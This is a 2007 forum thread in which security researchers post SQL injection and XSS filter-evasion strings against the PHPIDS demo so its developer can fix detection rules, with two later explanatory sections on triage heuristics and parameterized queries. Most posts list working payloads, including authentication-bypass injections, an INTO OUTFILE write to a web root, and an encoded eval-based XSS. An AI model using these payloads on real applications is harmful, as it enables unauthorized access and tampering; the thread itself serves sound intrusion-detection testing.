Re: PHPIDS (0.4 was just released)
Posted by: Reiners
Date: September 21, 2007 04:23PM

tx Wrote:
-------------------------------------------------------
> The comment rule
> (?:"\s*(?:#|--|{))|(?:\/\*!\s?\d+)|(?:ch(?:a)?r\s*\(\s*\d)
> catches ?test=' #1 !
> but can be evaded with ?test=' {some expression or text here} #{some alphanum} !

As already discussed it's very hard to filter "#" correctly because of false positives:
He's Player #1 !

So in my opinion it's more important to concentrate on the injection itself (which also works without comments):
having '1
SOUNDS LIKE '1

Re: PHPIDS (0.4 was just released)
Posted by: tx
Date: September 21, 2007 04:54PM

@Reiners: Yeah, good point on that.
Well for the record, here is another comment evasion:
http://demo.php-ids.org/?test=%27%3B--%20-%7Balphanum%7D-
?test=;-- -{alphanums}-
where {alphanums} is any alphanumeric string

-tx @ lowtech-labs.org

Re: PHPIDS (0.4 was just released)
Posted by: Reiners
Date: September 21, 2007 06:10PM

.mario Wrote:
-------------------------------------------------------
> I couldn't wait... all fixx0red :)

they still all work :D
replace all the "asd" with "a sd"

and for the into outfile:
http://demo.php-ids.org/?test=asd'%20INTO%20OUTFILE%2b'C:/webserver/www/readme.php

greetings and a nice weekend ;)

Re: PHPIDS (0.4 was just released)
Posted by: Reiners
Date: September 22, 2007 07:56AM

Hi .mario!
most injections get detected now. But again there might be a problem with false positives:
--> ?test=Results are 'true' or 'false'. (php-ids)
--> ?test=Choose between "red" and "green". (php-ids)
--> ?test=SQL Injection contest is coming in around '1 OR '2 weeks. (php-ids)

I guess it is very hard to find a rule for those short "or" sqli without triggering false positives. But I'm sure you will find a way :)

Same for the next injections.
--> ?test=asd' or column^'-1 (php-ids)
--> ?test=asd' or column sounds like '1 (php-ids)
In my opinion those two are not critical, because an attacker would have to guess the column name first and it may be wrong to filter every alphanumeric string behind "' or".

On the other hand the next two can always be used by an attacker:
--> ?test=asd' or md5(5)^'1 (php-ids)
--> ?test=asd' or true -- a (php-ids)


Just some thoughts :)

Re: PHPIDS (0.4 was just released)
Posted by: Anonymous User
Date: September 22, 2007 09:35AM

Hi!

@Reiners: You are creating very hard conditions for the coming contest - hats off ;)

The last ones were pretty hard to fix and required some modifications of the rules and the converter. Also I am still having problems with the comment detection and am thinking about removing # from detection because it's almost impossible to use it in the right manner - though that doesn't make that much sense.

The false alerts are fixed and I will take a look at the injections next. Thanks a lot for your submissions!

There's another thing I want to talk about. The last nights I played a little bit with levenshtein, soundex and other ways to compare and modify the attacks we have stored in our unit tests. After some time I had some script running which provided pretty surprising output (it's included in the trunk for testing purposes, the demo uses it too right now).

http://groups.google.com/group/php-ids/browse_thread/thread/ed6f0084bc0eb490
http://php-ids.org/files/centrifuge.phps

Maybe it's total bull - maybe we can make use of that. I am not sure - please let me know what you think!

Greetings,
.mario

Re: PHPIDS (0.4 was just released)
Posted by: Anonymous User
Date: September 22, 2007 12:22PM

That sounds good mario! I've been interested in levenshtein for a long time, can you explain how you implemented it?

Remember that I once suggested having a first layer of triage upon reserved chars in the URI? like: {' " ~ ^ # $ ( )} ?

In combination with data length, it could sort out a lot I guess.

Anyway, interesting.

Re: PHPIDS (0.4 was just released)
Posted by: Reiners
Date: September 22, 2007 12:45PM

Hi!
the new filter can be circumvented with an escaped quote:
--> ?test=\'asd' or 1='1 (php-ids)

Actually I should start to keep some filter evasions for the contest ;)

greetings, Reiners

edit:
--> ?test=a 1' or if(-1=-1,true,false)#! (php-ids)



Edited 2 time(s). Last edit at 09/22/2007 12:53PM by Reiners.

Re: PHPIDS (0.4 was just released)
Posted by: Spyware
Date: September 22, 2007 12:59PM

http://demo.php-ids.org/?test=select%20*something*%20from%20the%20menu

Re: PHPIDS (0.4 was just released)
Posted by: Anonymous User
Date: September 22, 2007 02:39PM

@Ronald: Yep - I remember :) I built this after having no success with levenshtein and pattern comparison. It basically strips out any normal character, normalizes the special chars and sorts the array. That way attack patterns like (((++::: appear for 85% of all long attacks (concatenation vectors, self-contained xss, filter evasion vectors in general). I think the recent contest showed that one can't rely on blacklisting only.

@Reiners: Wow - I like the escaped one - very cool!

@Spyware: thx for the fa - will fix immediately...

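As an added illustration of the two detection ideas in the posts above (Ronald's first-layer triage on reserved characters plus length, and .mario's strip, normalize and sort signature), here is a small Python sketch. It is my own code, not PHPIDS's centrifuge script and not from this thread; the bracket-folding table, the thresholds and the sample list are assumptions, and the sample strings are the benign sentences and short vectors quoted earlier in the thread.

```python
import re

# Ronald's proposed first-layer set of reserved characters (from the thread).
RESERVED = frozenset("'\"~^#$()")

# Assumed normalisation: the thread says centrifuge "normalizes the special
# chars" without saying how, so here every bracket is folded to "(" so that
# nesting depth rather than bracket flavour shapes the signature.
_FOLD = str.maketrans({")": "(", "[": "(", "]": "(", "{": "(", "}": "("})


def centrifuge(value: str) -> str:
    """Strip letters, digits and whitespace, fold brackets, sort the rest.

    The result is an order-independent signature such as "''((^"; long
    attack strings tend to pile up runs of the same few characters.
    """
    specials = re.sub(r"[A-Za-z0-9\s]", "", value)
    return "".join(sorted(specials.translate(_FOLD)))


def triage(value: str, *, max_reserved: int = 4, max_ratio: float = 0.25) -> dict:
    """First-layer triage combining reserved-char count, length and density.

    Thresholds are assumptions chosen so the benign sentences from the thread
    pass while the quoted short vectors are flagged; tune against real traffic
    before trusting the verdict, this is a pre-filter, not a rule set.
    """
    signature = centrifuge(value)
    reserved = sum(1 for c in value if c in RESERVED)
    ratio = len(signature) / len(value) if value else 0.0
    return {
        "length": len(value),
        "signature": signature,
        "reserved": reserved,
        "ratio": round(ratio, 3),
        "flag": reserved > max_reserved or ratio > max_ratio,
    }


# Constructed sample set: benign sentences and vectors quoted in this thread.
SAMPLES = [
    "He's Player #1 !",
    "Results are 'true' or 'false'.",
    "asd' or md5(5)^'1",
    "a'='a",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(f"{sample!r:36} -> {triage(sample)}")
```

The density check is what keeps "He's Player #1 !" below the line while the five-character "a'='a" is flagged; the reserved-character count alone would also flag the "'true' or 'false'" sentence, which is exactly the false-positive trade-off discussed in this thread.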
Re: PHPIDS (0.4 was just released)
Posted by: Spyware
Date: September 22, 2007 03:22PM

http://demo.php-ids.org/?test=--%3Ewatch%20this%3C--
http://demo.php-ids.org/?test=5%A3%20for%20%22THIS%22



Edited 2 time(s). Last edit at 09/22/2007 03:25PM by Spyware.

Re: PHPIDS (0.4 was just released)
Posted by: Reiners
Date: September 22, 2007 04:15PM

@.mario: almost fixed, but escaped quotes can still be used:
--> ?test=111\'aaa' or '1 php-ids

I was just going to show up with some functions which return true (without comparing to a value).
--> ?test=asd' or ISNULL(1/0) #(
--> ?test=asd' or LEAST(2,1) -- -a
But you fixed that already. good job!



Edited 2 time(s). Last edit at 09/22/2007 04:32PM by Reiners.

Re: PHPIDS (0.4 was just released)
Posted by: Gareth Heyes
Date: September 23, 2007 03:02PM

x=&#x65&#x76&#x61&#x6c,y=&#x61&#x6c&#x65&#x72&#x74&#x28&#x31&#x29
x(y)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Re: PHPIDS (0.4 was just released)
Posted by: Reiners
Date: September 23, 2007 07:51PM

Hi .mario!
would you mind if I load the smoketest with a script over and over? I collected some "or" sqli and would like to test them via script modified in different ways.
greetings, Reiners

Re: PHPIDS (0.4 was just released)
Posted by: Anonymous User
Date: September 24, 2007 01:28AM

@Gareth: Nice one - as already stated on the group, that one pointed to a big ugly bug in the converter. Thx!

@Reiners: No problem!

Re: PHPIDS (0.4 was just released)
Posted by: Reiners
Date: September 24, 2007 03:10AM

Hi!
after the first shot I get a 403 when accessing the site :( (had about 40 injections loaded).
until then the script worked out quite well :)

Re: PHPIDS (0.4 was just released)
Posted by: Anonymous User
Date: September 24, 2007 02:20PM

Hi!

Hmmm - that shouldn't be - the regression tests for the demo fire around 700 requests a minute at the demo...

What's the exact url you tried?

Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: Reiners
Date: September 24, 2007 03:47PM

I had a typo in my script trying to load demo-php.ids.org ... it was early in the morning ;)

seems like you filter everything very well.
I already mentioned this one:
--> ?test=aa'or column='1 (php-ids)

this wasn't that critical because the attacker first would have to guess the column name and it's hard to filter words behind "or".
However there are some constants which can be used by an attacker (tested on MySQL, but on other DBMS there might be similar constants to use):

--> ?test=aa'or LOCALTIME!='0 (php-ids)
--> ?test=aa'or BINARY 1= '1 (php-ids)
--> ?test=aa'or current_user!=' 1 (php-ids)

--> ?test=aa'or null is null #( (php-ids)

greetings,
Reiners

Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: tx
Date: September 24, 2007 09:59PM

more authentication bypass, mostly based around '+'.
I'm just too eager for an sqli contest I think :)

This http://demo.php-ids.org/?test=%27%20or%20username%20REGEXP%20%27admi*%27%20having%201%20%231%20%21 is still getting through.
?test=' or username REGEXP 'admi*' having 1 #1 !

Selecting by id: http://demo.php-ids.org/?test=%27%20or%20id%3D+1%20having%201%20%231%20%21
?test=' or id=+1 having 1 #1 !

Slightly modified version: http://demo.php-ids.org/?test=%27%20or%20id%3D+2-1%20having%201%20%231%20%21
?test=' or id=+2-1 having 1 #1 !

I suppose both of those require that the attacker know the id, but if an IDS isn't seeing the queries, brute forcing the id is pretty trivial.

Soundex: http://demo.php-ids.org/?test=%27%20or%20username%20SOUNDS%20LIKE+%22adnin%22%20and%201%3B%20--%20-a
' or username SOUNDS LIKE+"adnin" and 1; -- -a

Specifying table.column (and more '+'): http://demo.php-ids.org/?test='%20or%20users.username=%2b0x61646D696E;%20--%20-a
?test=' or users.username=+0x61646D696E; -- -a


EDIT:
some union select action: http://demo.php-ids.org/?test=%27%20%28begin%20union%20%28select+aaa%2Cbbb%20from%20ccc%3B%29%20end%29%3B%20--%20-a
?test=' (begin union (select+aaa,bbb from ccc;) end); -- -a

-tx @ lowtech-labs.org



Edited 2 time(s). Last edit at 09/24/2007 11:05PM by tx.

Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: Anonymous User
Date: September 25, 2007 01:57AM

"brute forcing the id" ^^

Okay, hey is this test form only POST or does it also represent GET? a ton of difference if you ask me. Why not cut to the chase and alert reserved chars in the request_uri, saves you 50% headaches.

Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: Gareth Heyes
Date: September 25, 2007 03:54AM

What's the purpose of the SQL injection contest? Just get a different ID or more dangerous injection?

http://demo.php-ids.org/?test='%20OR%20UserID%20<>%202
http://demo.php-ids.org/?test='%20OR%20UserID%20IS%20NOT%20NULL
http://demo.php-ids.org/?test='%20OR%20UserID%20RLIKE%20'.+'%20
http://demo.php-ids.org/?test='%20OR%20UserID%20>%201

What about when the XSS rules overlap with SQL rules? So what if the SQL rules aren't triggered but the XSS rule is?

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 09/25/2007 03:56AM by Gareth Heyes.

Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: Reiners
Date: September 25, 2007 03:35PM

this one is cool (only tested on MySQL):
--> ?test=a'='a (php-ids)
or
--> ?test='=' (php-ids)

it works for table listing and auth bypass:
select data from users where name=''='' and password=''=''

with this there are of course a lot of different vectors, since we don't need the "or" anymore.
--> ?test=a'!='0
--> ?test=aa'IS NOT NULL#(
--> ?test=0'XOR'1
--> ?test=a'IN('a')#(
and so on



Edited 1 time(s). Last edit at 09/25/2007 03:45PM by Reiners.

Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: Anonymous User
Date: September 25, 2007 04:46PM

Hi!

Thanks for the submissions - I am totally swamped in work right now but I will try to fix them tomorrow or Thursday...

I like
' OR UserID <> 2
and
'='
best - not UserId 2 matches 1 first - sweet!

Greetings,
.mario

Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: tx
Date: September 25, 2007 07:12PM

@Ronald: The form accepts POST and GET

Here is a new Auth Bypass, no commenting necessary: http://demo.php-ids.org/?test=abc%27%20NOT%20BETWEEN%20%270
?test=abc' NOT BETWEEN '0

Auth bypass using MATCH (column) AGAINST ('+true -false' IN BOOLEAN MODE): http://demo.php-ids.org/?test=%27%20or%20MATCH%20%28username%29%20AGAINST%20%28%27+admin%20-asds%27%20IN%20BOOLEAN%20MODE%29%20%3B--%20-a
?test=' or MATCH (username) AGAINST ('+admin -asds' IN BOOLEAN MODE) ;-- -a

-tx @ lowtech-labs.org



Edited 3 time(s). Last edit at 09/25/2007 07:25PM by tx.

Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: Anonymous User
Date: September 26, 2007 04:47PM

Hey guys,

I already fixed a bunch of them but not yet all. Will do Thursday evening! Sorry for the lame recent response but I hope after this week has passed I won't be stacked with work that much anymore so it'll get better soon ;)

Greetings and thanks!
.mario

Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: tx
Date: September 26, 2007 10:00PM

@mario: no worries, I don't know anybody who competes with your fixes+feedback turn around time. beats the hell out of google's 7 days :P

-tx @ lowtech-labs.org



Edited 1 time(s). Last edit at 09/26/2007 10:01PM by tx.

Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: Anonymous User
Date: September 27, 2007 10:33AM

Hi!

They should be fixed right now - tests are updated, regression test suite still running and as it seems no noticeable rise in false alerts. Thx!

Greetings,
.mario

Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: Reiners
Date: September 27, 2007 11:36AM

aa'!='1 (php-ids)
aa'!=~'1 (php-ids)
aa'=('aa')#(
aa'|+'1
aa'|!'aa
aa'^!'aa
... (and all those operands and prefixes)

aa'/0 is null #( (php-ids)
aa' DIV null is null #( (php-ids)
aa'DIV+1='aa (php-ids)
aa'or column!='1 (php-ids)
aa'or column DIV null IS NULL #( (php-ids)
aa'or column+(1)='1 (php-ids)
aa'or id sounds like'\' (php-ids)



Edited 3 time(s). Last edit at 09/27/2007 12:08PM by Reiners.

Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: tx
Date: September 27, 2007 03:09PM

@.mario: excellent fixes!

The MATCH...AGAINST auth bypass is still undetected: http://demo.php-ids.org/?test=%27%20or%20MATCH%20%28username%29%20AGAINST%20%28%27%2badmin%20-asds%27%20IN%20BOOLEAN%20MODE%29%3B%20--%20-a
?test=' or MATCH (username) AGAINST ('+admin -asds' IN BOOLEAN MODE) ;-- -a

Modified versions of the NOT BETWEEN vector: http://demo.php-ids.org/?test=abc%27%20NOT%20BETWEEN%20%21%21%270
?test=abc' NOT BETWEEN !!'0
This works with any even amount of '!' (w00t double negatives!):
?test=abc' NOT BETWEEN !!!!'0
?test=abc' NOT BETWEEN !!!!!!!!!!!!!!'0
More variations (likewise with multiple negation):
?test=abc' NOT BETWEEN !0 = !!'0
?test=abc' NOT BETWEEN !0 != !!!'0
?test=abc' NOT BETWEEN !+0 != !'0

I really think NOT BETWEEN is cool because it completely changes the context of the second clause in certain types of auth queries:
$sql = "SELECT * FROM `users` WHERE username='".$_GET['u']."' and password='".$_GET['p']."' LIMIT 1";

if 
  $_GET['u']= "' NOT BETWEEN !+0 != !'0"
  $_GET['p']= ''
query becomes:
SELECT * FROM `users` WHERE username='' NOT BETWEEN !+0 != !'0' and password='' LIMIT 1
bam!

:)

-tx @ lowtech-labs.org



Edited 3 time(s). Last edit at 09/27/2007 03:34PM by tx.

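The root cause behind every vector in this thread is the query shape tx quotes above: user input glued into the SQL text, so quote characters become syntax and the clause structure is up for grabs. As an added example (my own code, not from the post, from PHPIDS or from the demo site) here is that query pattern in Python beside its parameterized form, run against a constructed in-memory SQLite table. SQLite stands in for the MySQL back end, which is an assumption with a caveat: MySQL-only pieces from the thread such as `NOT BETWEEN !+0` or `#` comments do not parse in SQLite, so the demonstration uses the plain quoted tautology of the same family as the `' or 1='1` and `'='` vectors quoted earlier.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample user table (assumed data, not the demo site's)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password) VALUES (?, ?)",
        [("admin", "s3cret"), ("alice", "hunter2")],
    )
    conn.commit()
    return conn


def login_concat(conn: sqlite3.Connection, u: str, p: str):
    """Same shape as the PHP query quoted in the post: input glued into SQL.

    Returns the matched username or None; an unbalanced quote in the input
    (Spyware's "+z'" case) surfaces as a sqlite3.Error, as tx describes.
    """
    sql = (
        "SELECT username FROM users WHERE username='" + u
        + "' and password='" + p + "' LIMIT 1"
    )
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_param(conn: sqlite3.Connection, u: str, p: str):
    """Hardened form: values travel separately from the statement text, so a
    quote in the input is data, never syntax, and the WHERE structure is fixed."""
    sql = "SELECT username FROM users WHERE username=? AND password=? LIMIT 1"
    row = conn.execute(sql, (u, p)).fetchone()
    return row[0] if row else None


# Textbook quoted tautology; with AND binding tighter than OR the glued query
# becomes (username='') OR ('1'='1' AND password='') OR ('1'='1').
TAUTOLOGY = "' OR '1'='1"

if __name__ == "__main__":
    db = make_db()
    print("valid creds, concat :", login_concat(db, "alice", "hunter2"))
    print("tautology, concat   :", login_concat(db, TAUTOLOGY, TAUTOLOGY))
    print("tautology, param    :", login_param(db, TAUTOLOGY, TAUTOLOGY))
```

The parameterized version is the fix that makes the whole evasion game irrelevant for this query: the IDS rules discussed here are a second line of defence in front of code that cannot be changed, not a substitute for it.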
Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: Spyware
Date: September 27, 2007 03:27PM

I don't know much of SQL injection but, isn't this exploitable:
http://demo.php-ids.org/?test=+z'

EDIT 1/3:
(Don't click, copy paste, quote gets cut off) (Copy paste won't work either xD, do it manually)

EDIT 2:
False
http://demo.php-ids.org/?test=so%20I%20said%20%22back%20off!%22



Edited 3 time(s). Last edit at 09/27/2007 03:35PM by Spyware.

Re: PHPIDS (0.4.1 fresh out of the lab)
Posted by: tx
Date: September 27, 2007 03:45PM

@Spyware: in most queries +z' will leave you with an uneven number of quotes which will throw an error.
ie:
 Select * from `table` where id={injection point};
becomes
Select * from `table` where id=+z';

EDIT: @Spyware: %27 is your friend. %27 = '

-tx @ lowtech-labs.org



Edited 2 time(s). Last edit at 09/27/2007 03:47PM by tx.
